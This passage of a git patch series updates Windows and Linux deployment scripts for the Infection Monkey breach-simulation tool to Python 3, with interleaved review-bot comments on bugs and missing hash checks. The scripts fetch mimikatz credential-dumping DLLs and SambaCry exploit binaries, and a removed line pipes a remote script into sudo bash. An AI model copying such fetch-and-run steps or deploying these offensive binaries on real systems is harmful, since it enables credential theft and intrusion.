'"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } 
From 58ecb83977c1e87e04e4dad97a6187f5b41bf2db Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 05/44] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/build_windows.bat | 2 +- monkey/infection_monkey/monkey.spec | 1 + 4 files changed, 26 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 
@@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat index e2bf2935e..f763bda6b 100644 --- a/monkey/infection_monkey/build_windows.bat +++ b/monkey/infection_monkey/build_windows.bat @@ -1 +1 @@ -pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec +pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 
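Review bot: The restored C++ redistributable block downloads `$CPP_URL` (a `go.microsoft.com/fwlink` redirect, so the served file can change over time) to the relative path `cpp.exe` in the current directory and immediately runs it with `Start-Process -Wait`, with nothing that ties what executes to what was tested. A cheap check before running it is `if ((Get-AuthenticodeSignature $TEMP_CPP_INSTALLER).Status -ne 'Valid') { throw "cpp installer signature is not valid" }`, or comparing the file hash against a value recorded in config.ps1. The enclosing `Deploy-Windows` function starts and ends outside the hunk.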
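Review bot: In the restored UPX block, `Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue` hides an extraction failure (bad download, truncated zip), after which the following `Move-Item` fails with an unrelated "path not found" error. Use `-ErrorAction Stop` there so the failure is reported at its cause, and as with the other downloads, checking the archive hash before extracting it would keep the build reproducible. `$UPX_FOLDER`/`$UPX_URL` come from the config.ps1 hunk above.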
--- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 2d8caddd7b0c0dfa281554c5d89db6515ff250cf Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 06/44] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." 
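Review bot: `[Environment]::SetEnvironmentVariable("Path",$env:Path,"User")` persists the whole process `$env:Path` into the per-user Path; since earlier in this function `$env:Path` is built from the Machine and User values joined together, every machine-wide entry is copied into the user's persistent Path, and the duplication grows on each run. Write only the user portion back: `$user_path = [Environment]::GetEnvironmentVariable("Path","User")` followed by `[Environment]::SetEnvironmentVariable("Path", $user_path + ";" + $user_python_dir, "User")`. Also, `cmd.exe /c 'py -m site --user-site'` uses the `py` launcher while the rest of the script invokes `python`; if the two resolve to different interpreters the Scripts path added here belongs to the wrong one, so using `python -m site --user-site` would be consistent. `Deploy-Windows` starts and ends outside the hunk.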
From 7f009da96853be2422f939c53a71732d28580bc1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 07/44] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config @@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" +# Other binaries for monkey +TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64" +TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32" +SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so" +SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so" + # Mongo url's MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 4df8ba114..136e3f8b1 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh 
@@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" @@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" 
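Review bot: The fallback install branch is the only provisioning step with no error check: `sudo add-apt-repository ppa:deadsnakes/ppa` and `sudo apt install python3.7` run without `-y` or `|| handle_error`, so if either fails or is declined the script still sets `python_cmd="python3.7"` and only dies later at the pip step with an unrelated message. Use `sudo add-apt-repository -y ppa:deadsnakes/ppa || handle_error` and `sudo apt-get install -y python3.7 || handle_error`, and add a `log_message` saying that a third-party PPA and its signing key are being added to the host's apt trust so the user can decline knowingly. `${python_cmd} -m pip install pip` carries no `--user`/`--upgrade`, so for an unprivileged user it targets the system site-packages and is either a no-op or a permission error; `${python_cmd} -m pip install --user --upgrade pip` is presumably what was intended, matching the requirements line below it. The unquoted `${MONGO_PATH}` and `${ISLAND_BINARIES_PATH}` in the `mkdir -p` lines break on paths containing spaces; quote them as `"${MONGO_PATH}"`.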
@@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl 
@@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt 
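Review bot: `npm update` has been moved above `cd "$ISLAND_PATH/cc/ui" || handle_error`, so it now runs in whatever directory the script happens to be in rather than in the UI project; move it back under the `cd` so the sequence reads `cd "$ISLAND_PATH/cc/ui" || handle_error`, `npm update`, `npm run dist`. `mkdir ${MONKEY_BIN_DIR}` is the only mkdir in the script without `-p` and `|| handle_error`, so a rerun prints an error while a genuine failure goes uncaught; use `mkdir -p "${MONKEY_BIN_DIR}" || handle_error`. The four `wget` lines replace the removed from-source `build.sh` of the sambacry runner with prebuilt `.so` and traceroute binaries taken from the release URLs in `deployment_scripts/config` and place them straight into the agent's bin directory with no integrity check; recording an expected SHA-256 per URL in config (placeholder `<EXPECTED_SHA256>`) and running `sha256sum -c` after download would make a tampered or truncated download fail the script instead of being packaged. `sudo apt-get install python-dev ...` pulls Python 2 headers; for the 3.7 interpreter selected above, C-extension builds most likely need `python3.7-dev` instead (confirm against the requirements). The log text "Downloading tracerout binaries" is missing an "e".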
+++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file 
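Review bot: In `run.sh`, `./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db` starts mongod in the foreground, so the following `${python_cmd} monkey_island.py` is not reached until mongod exits; run it detached, e.g. `./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db --fork --logpath <log file> || exit 1`, or background it with `&` and wait until it accepts connections. When none of the three probes matches, `python_cmd` stays empty and the last line executes `monkey_island.py` directly; guard it with `[[ -n "$python_cmd" ]] || { echo "Python 3.7 not found" >&2; exit 1; }`. Dropping `cd /var/monkey` also makes both relative paths depend on the caller's working directory; since the script lives under `monkey_island/linux/`, `cd "$(dirname "$0")/.." || exit 1` near the top would pin it to the island directory (confirm that is where `monkey_island.py` resides). The detection block is a copy of the one added to `deploy_linux.sh` in this same commit; a shared helper sourced by both would keep the two sets of probes from drifting apart.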
diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index a2e734324..c887b8527 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From df7a43127a72d9ccb028f5bd246295540924218d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 08/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" 
@@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") 
@@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" From 1c880a76d9556a0561d45153eeb42d004f645516 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 09/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 ++++++-------- deployment_scripts/deploy_windows.ps1 | 35 ++++++--------------------- monkey/infection_monkey/monkey.spec | 12 +-------- 3 files changed, 15 insertions(+), 50 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 
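Review bot: The new line only rewords the message, but `$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)` on the next line still reads both variables that this same commit deletes from `config.ps1` (the `@@ -33,14 +33,11 @@` hunk), so with the commit applied the download is attempted with empty arguments and the step fails. Either keep the two definitions in this commit or remove the whole "Downloading Visual C++ Compiler" block here, which is what the PATCH 09 change later in the series ends up doing. `$PYWIN32_URL` in that config hunk likewise still points at the `py2.7` build of pywin32 after the interpreter moved to 3.7. The enclosing `Deploy-Windows` function starts and ends outside the hunk.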
@@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 
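Review bot: `$MK32_DLL = "mk32.zip"` and `$MK64_DLL = "mk64.zip"` now name archives while keeping the `_DLL` variable names, and the deploy script appears to save each download under that name in the bin directory (see the `$mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL` context in the PATCH 09 deploy hunk), so unless an extraction step exists elsewhere the agent ends up with a `.zip` where a DLL was expected — not visible from this hunk, confirm. Renaming to `$MK32_ZIP`/`$MK64_ZIP`, or adding `# archives, not DLLs; unpacked by deploy_windows.ps1` above them, would make the intent explicit. `$PYTHON_DLL = "C:\Windows\System32\python27.dll"` is left in context after the move to Python 3.7; if it is still consumed it names a library the new installer does not provide, and if it is not, it should be removed.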
@@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output 
@@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home 